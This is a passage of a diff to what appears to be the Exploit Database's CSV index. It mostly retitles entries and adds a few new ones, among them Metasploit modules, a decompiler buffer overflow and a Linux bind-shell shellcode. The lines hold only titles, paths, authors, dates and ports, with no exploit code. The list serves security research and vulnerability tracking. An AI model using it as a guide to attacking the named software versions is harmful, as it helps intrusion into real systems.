Injection (2)",2007-10-27,bunker,multiple,local,0 @@ -6185,7 +6189,7 @@ id,file,description,date,author,platform,type,port 7054,platforms/windows/local/7054.txt,"Anti-Keylogger Elite 3.3.0 - 'AKEProtect.sys' Privilege Escalation",2008-11-07,"NT Internals",windows,local,0 7129,platforms/multiple/local/7129.sh,"Sudo 1.6.9p18 - (Defaults setenv) Privilege Escalation",2008-11-15,kingcope,multiple,local,0 7135,platforms/windows/local/7135.htm,"Opera 9.62 - 'file://' Local Heap Overflow",2008-11-17,"Guido Landi",windows,local,0 -7171,platforms/multiple/local/7171.txt,"PHP 5.2.6 - (error_log) Safe_mode Bypass",2008-11-20,SecurityReason,multiple,local,0 +7171,platforms/multiple/local/7171.txt,"PHP 5.2.6 - 'error_log' Safe_mode Bypass Exploit",2008-11-20,SecurityReason,multiple,local,0 7177,platforms/linux/local/7177.c,"Oracle Database Vault - 'ptrace(2)' Privilege Escalation",2008-11-20,"Jakub Wartak",linux,local,0 40988,platforms/windows/local/40988.c,"Kaspersky 17.0.0 - Local CA root Incorrectly Protected",2017-01-04,"Google Security Research",windows,local,0 7264,platforms/windows/local/7264.txt,"Apache Tomcat (Windows) - 'runtime.getRuntime().exec()' Privilege Escalation",2008-11-28,Abysssec,windows,local,0 @@ -6194,10 +6198,10 @@ id,file,description,date,author,platform,type,port 7329,platforms/windows/local/7329.py,"Cain & Abel 4.9.23 - '.rdp' Buffer Overflow",2008-12-03,Encrypt3d.M!nd,windows,local,0 7334,platforms/windows/local/7334.pl,"RadASM 2.2.1.5 - '.rap' WindowCallProcA Pointer Hijack Exploit",2008-12-03,DATA_SNIPER,windows,local,0 7347,platforms/windows/local/7347.pl,"PEiD 0.92 - Malformed '.PE' File Universal Buffer Overflow",2008-12-05,SkD,windows,local,0 -7393,platforms/linux/local/7393.txt,"PHP - Safe_mode Bypass via proc_open() and custom Environment",2008-12-09,gat3way,linux,local,0 +7393,platforms/linux/local/7393.txt,"PHP - 'Safe_mode' Bypass via 'proc_open()' and custom Environment",2008-12-09,gat3way,linux,local,0 7492,platforms/windows/local/7492.py,"Realtek Sound Manager (rtlrack.exe 1.15.0.0) - Playlist Buffer Overflow",2008-12-16,shinnai,windows,local,0 7501,platforms/windows/local/7501.asp,"Microsoft SQL Server - sp_replwritetovarbin() Heap Overflow",2008-12-17,"Guido Landi",windows,local,0 -7503,platforms/multiple/local/7503.txt,"PHP python extension safe_mode - Bypass Local",2008-12-17,"Amir Salmani",multiple,local,0 +7503,platforms/multiple/local/7503.txt,"PHP 'python' Extension - 'safe_mode' Local Bypass Exploit",2008-12-17,"Amir Salmani",multiple,local,0 7516,platforms/windows/local/7516.txt,"ESET Smart Security 3.0.672 - 'epfw.sys' Privilege Escalation",2008-12-18,"NT Internals",windows,local,0 7533,platforms/windows/local/7533.txt,"PowerStrip 3.84 - 'pstrip.sys' Privilege Escalation",2008-12-21,"NT Internals",windows,local,0 7536,platforms/windows/local/7536.cpp,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow",2008-12-21,r0ut3r,windows,local,0 @@ -8293,7 +8297,7 @@ id,file,description,date,author,platform,type,port 28405,platforms/linux/local/28405.txt,"Roxio Toast 7 - DejaVu Component PATH Variable Privilege Escalation",2006-08-18,Netragard,linux,local,0 28425,platforms/solaris/local/28425.txt,"Sun Solaris 8/9 UCB/PS - Command Local Information Disclosure",2006-03-27,anonymous,solaris,local,0 28427,platforms/novell/local/28427.pl,"Novell Identity Manager - Arbitrary Command Execution",2006-08-18,anonymous,novell,local,0 -28504,platforms/php/local/28504.php,"PHP 3 < 5 - Ini_Restore() Safe_mode and open_basedir Restriction Bypass",2006-09-09,"Maksymilian Arciemowicz",php,local,0 +28504,platforms/php/local/28504.php,"PHP 3 < 5 - Ini_Restore() 'Safe_mode' / 'open_basedir' Restriction Bypass",2006-09-09,"Maksymilian Arciemowicz",php,local,0 28507,platforms/aix/local/28507.sh,"IBM AIX 6.1 / 7.1 - Privilege Escalation",2013-09-24,"Kristian Erik Hermansen",aix,local,0 28576,platforms/osx/local/28576.txt,"Apple Mac OSX 10.x - KExtLoad Format String",2006-09-14,"Adriel T. Desautels",osx,local,0 40376,platforms/windows/local/40376.txt,"Multiple Icecream Apps - Insecure File Permissions Privilege Escalation",2016-09-13,Tulpa,windows,local,0 @@ -8322,7 +8326,7 @@ id,file,description,date,author,platform,type,port 29194,platforms/osx/local/29194.c,"Apple Mac OSX 10.4.x - AppleTalk AIOCRegLocalZN IOCTL Stack Buffer Overflow",2006-11-27,LMH,osx,local,0 29201,platforms/osx/local/29201.c,"Apple Mac OSX 10.4.x - Shared_Region_Make_Private_Np Kernel Function Local Memory Corruption",2006-11-29,LMH,osx,local,0 29234,platforms/windows/local/29234.py,"VideoCharge Studio 2.12.3.685 - Buffer Overflow (SEH)",2013-10-27,metacom,windows,local,0 -29239,platforms/php/local/29239.txt,"PHP 5.2 - Session.Save_Path() Safe_mode and open_basedir Restriction Bypass",2006-12-08,"Maksymilian Arciemowicz",php,local,0 +29239,platforms/php/local/29239.txt,"PHP 5.2 - Session.Save_Path() 'Safe_mode' / 'open_basedir' Restriction Bypass",2006-12-08,"Maksymilian Arciemowicz",php,local,0 29327,platforms/windows/local/29327.py,"Watermark Master 2.2.23 - Buffer Overflow (SEH)",2013-11-01,metacom,windows,local,0 29263,platforms/windows/local/29263.pl,"BlazeDVD 6.2 - '.plf' Buffer Overflow (SEH)",2013-10-28,"Mike Czumak",windows,local,0 29309,platforms/windows/local/29309.pl,"AudioCoder 0.8.22 - '.m3u' Buffer Overflow (SEH)",2013-10-30,"Mike Czumak",windows,local,0 @@ -8337,7 +8341,7 @@ id,file,description,date,author,platform,type,port 30021,platforms/solaris/local/30021.txt,"Sun Microsystems Solaris SRSEXEC 3.2.x - Arbitrary File Read Local Information Disclosure",2007-05-10,anonymous,solaris,local,0 30014,platforms/windows/local/30014.py,"Microsoft Windows - 'NDPROXY' SYSTEM Privilege Escalation (MS14-002)",2013-12-03,ryujin,windows,local,0 29547,platforms/windows/local/29547.rb,"VideoSpirit Pro 1.90 - Buffer Overflow (SEH)",2013-11-12,metacom,windows,local,0 -29528,platforms/php/local/29528.txt,"PHP 5.2 - FOpen Safe_mode Restriction-Bypass",2007-01-26,"Maksymilian Arciemowicz",php,local,0 +29528,platforms/php/local/29528.txt,"PHP 5.2 - FOpen 'Safe_mode' Restriction Bypass Exploit",2007-01-26,"Maksymilian Arciemowicz",php,local,0 29548,platforms/windows/local/29548.rb,"VideoSpirit Lite 1.77 - Buffer Overflow (SEH)",2013-11-12,metacom,windows,local,0 29549,platforms/windows/local/29549.pl,"ALLPlayer 5.6.2 - '.m3u' File Local Buffer Overflow (Unicode SEH)",2013-11-12,"Mike Czumak",windows,local,0 29594,platforms/windows/local/29594.txt,"Watermark Master 2.2.23 - '.wstyle' Buffer Overflow (SEH)",2013-11-14,"Mike Czumak",windows,local,0 @@ -8432,14 +8436,14 @@ id,file,description,date,author,platform,type,port 32158,platforms/windows/local/32158.txt,"iCAM Workstation Control 4.8.0.0 - Authentication Bypass",2014-03-10,StealthHydra,windows,local,0 32205,platforms/windows/local/32205.txt,"Huawei Technologies eSpace Meeting Service 1.0.0.23 - Privilege Escalation",2014-03-12,LiquidWorm,windows,local,0 32261,platforms/windows/local/32261.rb,"MicroP 0.1.1.1600 - '.mppl' Local Stack Based Buffer Overflow",2014-03-14,"Necmettin COSKUN",windows,local,0 -32343,platforms/php/local/32343.php,"PHP 5.2.5 - Multiple functions 'safe_mode_exec_dir' and 'open_basedir' Restriction Bypass Vulnerabilities",2008-09-08,Ciph3r,php,local,0 +32343,platforms/php/local/32343.php,"PHP 5.2.5 - Multiple functions 'safe_mode_exec_dir' / 'open_basedir' Restriction Bypass Vulnerabilities",2008-09-08,Ciph3r,php,local,0 32358,platforms/windows/local/32358.pl,"MP3Info 0.8.5a - Buffer Overflow (SEH)",2014-03-19,"Ayman Sagy",windows,local,0 32370,platforms/hardware/local/32370.txt,"Quantum vmPRO 3.1.2 - Privilege Escalation",2014-03-19,xistence,hardware,local,0 32446,platforms/linux/local/32446.txt,"Xen 3.3 - XenStore Domain Configuration Data Unsafe Storage",2008-09-30,"Pascal Bouchareine",linux,local,0 32501,platforms/multiple/local/32501.txt,"NXP Semiconductors MIFARE Classic Smartcard - Multiple Security Weaknesses",2008-10-21,"Flavio D. Garcia",multiple,local,0 32585,platforms/windows/local/32585.py,"AudioCoder 0.8.29 - Memory Corruption (SEH)",2014-03-30,sajith,windows,local,0 32590,platforms/windows/local/32590.c,"Microsoft Windows Vista - 'iphlpapi.dll' Local Kernel Buffer Overflow",2008-11-19,"Marius Wachtler",windows,local,0 -32693,platforms/php/local/32693.php,"suPHP 0.7 - 'suPHP_ConfigPath' Safe Mode Restriction-Bypass",2008-12-31,Mr.SaFa7,php,local,0 +32693,platforms/php/local/32693.php,"suPHP 0.7 - 'suPHP_ConfigPath' Safe_Mode() Restriction Bypass Exploit",2008-12-31,Mr.SaFa7,php,local,0 32700,platforms/linux/local/32700.rb,"ibstat $PATH - Privilege Escalation (Metasploit)",2014-04-04,Metasploit,linux,local,0 32737,platforms/windows/local/32737.pl,"BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow Jump ESP",2014-04-08,"Deepak Rathore",windows,local,0 32751,platforms/lin_x86-64/local/32751.c,"Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation",2009-01-23,"Chris Evans",lin_x86-64,local,0 @@ -8459,7 +8463,7 @@ id,file,description,date,author,platform,type,port 32891,platforms/windows/local/32891.txt,"Microsoft Windows XP/Vista/2003/2008 - WMI Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0 32892,platforms/windows/local/32892.txt,"Microsoft Windows XP/2003 - RPCSS Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0 32893,platforms/windows/local/32893.txt,"Microsoft Windows Vista/2008 - Thread Pool ACL Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0 -32901,platforms/php/local/32901.php,"PHP 5.2.9 cURL - 'Safe_mode' and 'open_basedir' Restriction-Bypass",2009-04-10,"Maksymilian Arciemowicz",php,local,0 +32901,platforms/php/local/32901.php,"PHP 5.2.9 cURL - 'Safe_mode' / 'open_basedir' Restriction Bypass Exploit",2009-04-10,"Maksymilian Arciemowicz",php,local,0 32946,platforms/freebsd/local/32946.c,"FreeBSD 7.1 libc - Berkley DB Interface Uninitialized Memory Local Information Disclosure",2009-01-15,"Jaakko Heinonen",freebsd,local,0 32947,platforms/linux/local/32947.txt,"DirectAdmin 1.33.3 - '/CMD_DB' Backup Action Insecure Temporary File Creation",2009-04-22,anonymous,linux,local,0 33012,platforms/windows/local/33012.c,"Microsoft Windows XP/2000/2003 - Desktop Wall Paper System Parameter Privilege Escalation",2009-02-02,Arkon,windows,local,0 @@ -9106,6 +9110,7 @@ id,file,description,date,author,platform,type,port 42174,platforms/windows/local/42174.py,"Easy MOV Converter 1.4.24 - 'Enter User Name' Buffer Overflow (SEH)",2017-06-13,abatchy17,windows,local,0 42181,platforms/windows/local/42181.py,"VX Search Enterprise 9.7.18 - Local Buffer Overflow",2017-06-15,ScrR1pTK1dd13,windows,local,0 42183,platforms/linux/local/42183.c,"Sudo 1.8.20 - 'get_process_ttyname()' Privilege Escalation",2017-06-14,"Qualys Corporation",linux,local,0 +42255,platforms/linux/local/42255.py,"JAD Java Decompiler 1.5.8e - Buffer Overflow",2017-06-26,"Juan Sacco",linux,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -10386,7 +10391,7 @@ id,file,description,date,author,platform,type,port 9649,platforms/windows/remote/9649.txt,"Xerver HTTP Server 4.32 - Arbitrary Source Code Disclosure",2009-09-11,Dr_IDE,windows,remote,0 9650,platforms/windows/remote/9650.txt,"Kolibri+ Web Server 2 - Arbitrary Source Code Disclosure (2)",2009-09-11,Dr_IDE,windows,remote,0 9651,platforms/multiple/remote/9651.txt,"Mozilla Firefox < 3.0.14 - Multiplatform Remote Code Execution via pkcs11.addmodule",2009-09-11,"Dan Kaminsky",multiple,remote,0 -9652,platforms/windows/remote/9652.sh,"Oracle Secure Backup Server 10.3.0.1.0 - Authentication Bypass/RCI Exploit",2009-09-14,ikki,windows,remote,80 +9652,platforms/windows/remote/9652.sh,"Oracle Secure Backup Server 10.3.0.1.0 - Authentication Bypass / Remote Code Injection Exploit",2009-09-14,ikki,windows,remote,80 9658,platforms/hardware/remote/9658.txt,"Neufbox NB4-R1.5.10-MAIN - Persistent Cross-Site Scripting",2009-09-14,"599eme Man",hardware,remote,0 9660,platforms/windows/remote/9660.pl,"Techlogica HTTP Server 1.03 - Arbitrary File Disclosure",2009-09-14,"ThE g0bL!N",windows,remote,0 9662,platforms/windows/remote/9662.c,"IPSwitch IMAP Server 9.20 - Remote Buffer Overflow",2009-09-14,dmc,windows,remote,143 @@ -12454,7 +12459,7 @@ id,file,description,date,author,platform,type,port 21152,platforms/linux/remote/21152.c,"ActivePerl 5.6.1 - 'perlIIS.dll' Buffer Overflow (1)",2001-11-15,Indigo,linux,remote,0 21153,platforms/windows/remote/21153.c,"ActivePerl 5.6.1 - 'perlIIS.dll' Buffer Overflow (2)",2001-11-15,Indigo,windows,remote,0 21154,platforms/multiple/remote/21154.pl,"ActivePerl 5.6.1 - 'perlIIS.dll' Buffer Overflow (3)",2001-11-15,Sapient2003,multiple,remote,0 -21155,platforms/php/remote/21155.txt,"Network Tool 0.2 PHP-Nuke Addon - MetaCharacter Filtering Command Execution",2001-11-16,"Cabezon Aurélien",php,remote,0 +21155,platforms/php/remote/21155.txt,"PHP-Nuke Network Tool 0.2 Addon - MetaCharacter Filtering Command Execution",2001-11-16,"Cabezon Aurélien",php,remote,0 21156,platforms/windows/remote/21156.txt,"Opera 5.0/5.1 - Same Origin Policy Circumvention",2001-11-15,"Georgi Guninski",windows,remote,0 21160,platforms/multiple/remote/21160.txt,"ibm informix Web Datablade 3.x/4.1 - Directory Traversal",2001-11-22,"Beck Mr.R",multiple,remote,0 21161,platforms/unix/remote/21161.txt,"WU-FTPD 2.6 - File Globbing Heap Corruption",2001-11-27,"Core Security Technologies",unix,remote,0 @@ -13803,7 +13808,7 @@ id,file,description,date,author,platform,type,port 27428,platforms/hardware/remote/27428.rb,"D-Link Devices - 'tools_vct.xgi' Unauthenticated Remote Command Execution (Metasploit)",2013-08-08,Metasploit,hardware,remote,0 27429,platforms/windows/remote/27429.rb,"Mozilla Firefox - onreadystatechange Event DocumentViewerImpl Use-After-Free (Metasploit)",2013-08-08,Metasploit,windows,remote,0 27452,platforms/hardware/remote/27452.txt,"F5 Firepass 4100 SSL VPN - Cross-Site Scripting",2006-03-21,"ILION Research",hardware,remote,0 -27508,platforms/php/remote/27508.txt,"PHP 4.x/5.x - Html_Entity_Decode() Information Disclosure",2006-03-29,Samuel,php,remote,0 +27508,platforms/php/remote/27508.txt,"PHP 4.x/5.x - 'Html_Entity_Decode()' Information Disclosure",2006-03-29,Samuel,php,remote,0 27523,platforms/windows/remote/27523.py,"Sami FTP Server 2.0.1 - MKD Buffer Overflow ASLR Bypass (SEH)",2013-08-12,Polunchis,windows,remote,21 27526,platforms/windows/remote/27526.txt,"Oracle Java - storeImageArray() Invalid Array Indexing",2013-08-12,"Packet Storm",windows,remote,0 27527,platforms/multiple/remote/27527.rb,"Ruby on Rails - Known Secret Session Cookie Remote Code Execution (Metasploit)",2013-08-12,Metasploit,multiple,remote,0 @@ -13818,7 +13823,7 @@ id,file,description,date,author,platform,type,port 27569,platforms/windows/remote/27569.txt,"UltraVNC 1.0.1 - Multiple Remote Error Logging Buffer Overflow Vulnerabilities (2)",2006-04-04,"Luigi Auriemma",windows,remote,0 27577,platforms/windows/remote/27577.txt,"Microsoft Internet Explorer 5 - Address Bar Spoofing",2006-04-03,"Hai Nam Luke",windows,remote,0 27595,platforms/php/remote/27595.txt,"PHP 4.x - tempnam() Function open_basedir Restriction Bypass",2006-04-10,"Maksymilian Arciemowicz",php,remote,0 -27596,platforms/php/remote/27596.txt,"PHP 4.x - copy() Function Safe Mode Bypass",2006-04-10,"Maksymilian Arciemowicz",php,remote,0 +27596,platforms/php/remote/27596.txt,"PHP 4.x - 'copy()' Function 'Safe_Mode' Bypass Exploit",2006-04-10,"Maksymilian Arciemowicz",php,remote,0 27806,platforms/windows/remote/27806.txt,"BankTown ActiveX Control 1.4.2.51817/1.5.2.50209 - Remote Buffer Overflow",2006-05-03,"Gyu Tae",windows,remote,0 27606,platforms/windows/remote/27606.rb,"Intrasrv 1.0 - Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,remote,80 27607,platforms/windows/remote/27607.rb,"MiniWeb 300 - Arbitrary File Upload (Metasploit)",2013-08-15,Metasploit,windows,remote,8000 @@ -14236,7 +14241,7 @@ id,file,description,date,author,platform,type,port 31050,platforms/multiple/remote/31050.php,"Firebird 2.0.3 Relational Database - 'protocol.cpp' XDR Protocol Remote Memory Corruption",2008-01-28,"Damian Frizza",multiple,remote,0 31051,platforms/linux/remote/31051.txt,"Mozilla Firefox 2.0 - 'chrome://' URI JavaScript File Request Information Disclosure",2008-01-19,"Gerry Eisenhaur",linux,remote,0 31052,platforms/linux/remote/31052.java,"Apache 2.2.6 mod_negotiation - HTML Injection and HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0 -31053,platforms/php/remote/31053.php,"PHP 5.2.5 - cURL 'safe mode' Security Bypass",2008-01-23,"Maksymilian Arciemowicz",php,remote,0 +31053,platforms/php/remote/31053.php,"PHP 5.2.5 - cURL 'safe_mode' Security Bypass Exploit",2008-01-23,"Maksymilian Arciemowicz",php,remote,0 31056,platforms/windows/remote/31056.py,"Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0 40358,platforms/linux/remote/40358.py,"LamaHub 0.0.6.2 - Buffer Overflow",2016-09-09,Pi3rrot,linux,remote,4111 31072,platforms/windows/remote/31072.html,"Symantec Backup Exec System Recovery Manager 7.0 - FileUpload Class Unauthorized File Upload",2007-01-05,titon,windows,remote,0 @@ -14698,7 +14703,7 @@ id,file,description,date,author,platform,type,port 33964,platforms/windows/remote/33964.txt,"X-Motor Racing 1.26 - Buffer Overflow / Multiple Denial of Service Vulnerabilities",2010-05-06,"Luigi Auriemma",windows,remote,0 33971,platforms/windows/remote/33971.c,"Rebellion Aliens vs Predator 2.22 - Multiple Memory Corruption Vulnerabilities",2010-05-07,"Luigi Auriemma",windows,remote,0 33920,platforms/php/remote/33920.php,"PHP 5.3 - 'PHP_dechunk()' HTTP Chunked Encoding Integer Overflow",2010-05-02,"Stefan Esser",php,remote,0 -33988,platforms/php/remote/33988.txt,"PHP 5.x (5.3.x 5.3.2) - 'ext/phar/stream.c' and 'ext/phar/dirstream.c' Multiple Format String Vulnerabilities",2010-05-14,"Stefan Esser",php,remote,0 +33988,platforms/php/remote/33988.txt,"PHP 5.3.x < 5.3.2 - 'ext/phar/stream.c' / 'ext/phar/dirstream.c' Multiple Format String Vulnerabilities",2010-05-14,"Stefan Esser",php,remote,0 33989,platforms/windows/remote/33989.rb,"Oracle Event Processing FileUploadServlet - Arbitrary File Upload (Metasploit)",2014-07-07,Metasploit,windows,remote,9002 33929,platforms/multiple/remote/33929.py,"Gitlist 0.4.0 - Remote Code Execution",2014-06-30,drone,multiple,remote,0 33935,platforms/windows/remote/33935.txt,"rbot 0.9.14 - '!react' Command Unauthorized Access",2010-02-24,nks,windows,remote,0 @@ -15463,7 +15468,7 @@ id,file,description,date,author,platform,type,port 40130,platforms/php/remote/40130.rb,"Drupal Module RESTWS 7.x - Remote PHP Code Execution (Metasploit)",2016-07-20,"Mehmet Ince",php,remote,80 40136,platforms/linux/remote/40136.py,"OpenSSHd 7.2p2 - Username Enumeration",2016-07-20,0_o,linux,remote,22 40138,platforms/windows/remote/40138.py,"TFTP Server 1.4 - 'WRQ' Buffer Overflow (Egghunter)",2016-07-21,"Karn Ganeshen",windows,remote,69 -40142,platforms/php/remote/40142.php,"Apache 2.4.7 + PHP 7.0.2 - openssl_seal() Uninitialized Memory Code Execution",2016-02-01,akat1,php,remote,0 +40142,platforms/php/remote/40142.php,"Apache 2.4.7 + PHP 7.0.2 - 'openssl_seal()' Uninitialized Memory Code Execution",2016-02-01,akat1,php,remote,0 40144,platforms/php/remote/40144.php,"Drupal Module Coder < 7.x-1.3 / 7.x-2.6 - Remote Code Execution (SA-CONTRIB-2016-039)",2016-07-23,Raz0r,php,remote,0 40146,platforms/linux/remote/40146.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000 40147,platforms/linux/remote/40147.rb,"Barracuda Spam & Virus Firewall 5.1.3.007 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000 @@ -15595,6 +15600,7 @@ id,file,description,date,author,platform,type,port 41694,platforms/multiple/remote/41694.rb,"SSH - User Code Execution (Metasploit)",1999-01-01,Metasploit,multiple,remote,0 41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0 41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0 +42256,platforms/windows/remote/42256.rb,"Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit)",2017-06-17,Metasploit,windows,remote,80 41987,platforms/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0 41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0 41719,platforms/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - (Un)authenticated hidden_lang_avi Stack Overflow (Metasploit)",2017-03-24,Metasploit,hardware,remote,80 @@ -15623,7 +15629,7 @@ id,file,description,date,author,platform,type,port 41964,platforms/macos/remote/41964.html,"Apple Safari 10.0.3 - 'JSC::CachedCall' Use-After-Free",2017-05-04,"saelo and niklasb",macos,remote,0 41975,platforms/windows/remote/41975.txt,"Microsoft Security Essentials / SCEP (Microsoft Windows 8/8.1/10 / Windows Server) - 'MsMpEng' Remotely Exploitable Type Confusion",2017-05-09,"Google Security Research",windows,remote,0 41978,platforms/multiple/remote/41978.py,"Oracle GoldenGate 12.1.2.0.0 - Unauthenticated Remote Code Execution",2017-05-09,"Silent Signal",multiple,remote,0 -41980,platforms/python/remote/41980.rb,"Crypttech CryptoLog - Remote Code Execution (Metasploit)",2017-05-09,Metasploit,python,remote,80 +41980,platforms/python/remote/41980.rb,"Crypttech CryptoLog - Remote Code Execution (Metasploit)",2017-05-09,"Mehmet Ince",python,remote,80 41992,platforms/windows/remote/41992.rb,"Microsoft IIS - WebDav 'ScStoragePathFromUrl' Overflow (Metasploit)",2017-05-11,Metasploit,windows,remote,0 41996,platforms/php/remote/41996.sh,"Vanilla Forums < 2.3 - Remote Code Execution",2017-05-11,"Dawid Golunski",php,remote,0 42010,platforms/linux/remote/42010.rb,"Quest Privilege Manager - pmmasterd Buffer Overflow (Metasploit)",2017-05-15,Metasploit,linux,remote,0 @@ -15653,6 +15659,8 @@ id,file,description,date,author,platform,type,port 42175,platforms/android/remote/42175.html,"Google Chrome - V8 Private Property Arbitrary Code Execution",2017-06-14,Qihoo360,android,remote,0 42176,platforms/hardware/remote/42176.py,"HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution",2017-06-14,"Jacob Baines",hardware,remote,9100 42186,platforms/windows/remote/42186.py,"Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow (DEP Bypass)",2017-06-15,"bl4ck h4ck3r",windows,remote,0 +42251,platforms/python/remote/42251.rb,"Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit)",2017-06-26,"Mehmet Ince",python,remote,443 +42257,platforms/cgi/remote/42257.rb,"Netgear DGN2200 - dnslookup.cgi Command Injection (Metasploit)",2017-06-26,Metasploit,cgi,remote,80 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -16295,6 +16303,7 @@ id,file,description,date,author,platform,type,port 42177,platforms/lin_x86/shellcode/42177.c,"Linux/x86 - XOR encoded execve(/bin/sh) setuid(0) setgid(0) Shellcode (66 bytes)",2017-06-15,nullparasite,lin_x86,shellcode,0 42179,platforms/lin_x86-64/shellcode/42179.c,"Linux/x86_64 - execve(_/bin/sh_) Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,lin_x86-64,shellcode,0 42208,platforms/lin_x86/shellcode/42208.nasm,"Linux/x86 - Reverse UDP Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",lin_x86,shellcode,0 +42254,platforms/lin_x86/shellcode/42254.c,"Linux/x86 - Bind Shell Shellcode (75 bytes)",2017-06-26,wetw0rk,lin_x86,shellcode,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 @@ -16580,7 +16589,7 @@ id,file,description,date,author,platform,type,port 1567,platforms/php/webapps/1567.php,"RedBLoG 0.5 - 'cat_id' SQL Injection",2006-03-08,x128,php,webapps,0 1569,platforms/asp/webapps/1569.pl,"d2kBlog 1.0.3 - (memName) SQL Injection",2006-03-09,DevilBox,asp,webapps,0 1570,platforms/php/webapps/1570.pl,"Light Weight Calendar 1.x - (date) Remote Code Execution",2006-03-09,Hessam-x,php,webapps,0 -1571,platforms/asp/webapps/1571.htm,"JiRos Banner Experience 1.0 - (Create Authentication Bypass) Remote Exploit",2006-03-09,nukedx,asp,webapps,0 +1571,platforms/asp/webapps/1571.htm,"JiRos Banner Experience 1.0 - Create Authentication Bypass Remote Exploit",2006-03-09,nukedx,asp,webapps,0 1575,platforms/php/webapps/1575.pl,"Guestbook Script 1.7 - (include_files) Remote Code Execution",2006-03-11,rgod,php,webapps,0 1576,platforms/php/webapps/1576.txt,"Jupiter CMS 1.1.5 - Multiple Cross-Site Scripting",2006-03-11,Nomenumbra,php,webapps,0 1581,platforms/php/webapps/1581.pl,"Simple PHP Blog 0.4.7.1 - Remote Command Execution",2006-03-13,rgod,php,webapps,0 @@ -16830,7 +16839,7 @@ id,file,description,date,author,platform,type,port 1957,platforms/php/webapps/1957.pl,"Scout Portal Toolkit 1.4.0 - 'forumid' Parameter SQL Injection",2006-06-27,simo64,php,webapps,0 1959,platforms/php/webapps/1959.txt,"RsGallery2 < 1.11.2 - 'rsgallery.html.php' File Inclusion",2006-06-28,marriottvn,php,webapps,0 1960,platforms/php/webapps/1960.php,"Blog:CMS 4.0.0k - SQL Injection",2006-06-28,rgod,php,webapps,0 -1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module - (lid) SQL Injection",2006-06-28,KeyCoder,php,webapps,0 +1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module - 'lid' SQL Injection",2006-06-28,KeyCoder,php,webapps,0 1963,platforms/php/webapps/1963.txt,"GeekLog 1.4.0sr3 - (_CONF[path]) Remote File Inclusion",2006-06-29,Kw3[R]Ln,php,webapps,0 1964,platforms/php/webapps/1964.php,"GeekLog 1.4.0sr3 - 'f(u)ckeditor' Remote Code Execution",2006-06-29,rgod,php,webapps,0 1968,platforms/php/webapps/1968.php,"DZCP (deV!L_z Clanportal) 1.34 - 'id' SQL Injection",2006-07-01,x128,php,webapps,0 @@ -17547,7 +17556,7 @@ id,file,description,date,author,platform,type,port 2944,platforms/php/webapps/2944.txt,"VerliAdmin 0.3 - 'index.php' Remote File Inclusion",2006-12-18,Kacper,php,webapps,0 2945,platforms/php/webapps/2945.txt,"Uploader & Downloader 3.0 - (id_user) SQL Injection",2006-12-18,"the master",php,webapps,0 2948,platforms/php/webapps/2948.txt,"RateMe 1.3.2 - 'main.inc.php' Remote File Inclusion",2006-12-18,"Al7ejaz Hacker",php,webapps,0 -2953,platforms/php/webapps/2953.php,"PHP-Update 2.7 - extract() Authentication Bypass / Shell Inject Exploit",2006-12-19,rgod,php,webapps,0 +2953,platforms/php/webapps/2953.php,"PHP-Update 2.7 - 'extract()' Authentication Bypass / Shell Inject Exploit",2006-12-19,rgod,php,webapps,0 2955,platforms/php/webapps/2955.txt,"Paristemi 0.8.3b - 'buycd.php' Remote File Inclusion",2006-12-19,nuffsaid,php,webapps,0 2956,platforms/php/webapps/2956.txt,"phpProfiles 3.1.2b - Multiple Remote File Inclusion",2006-12-19,nuffsaid,php,webapps,0 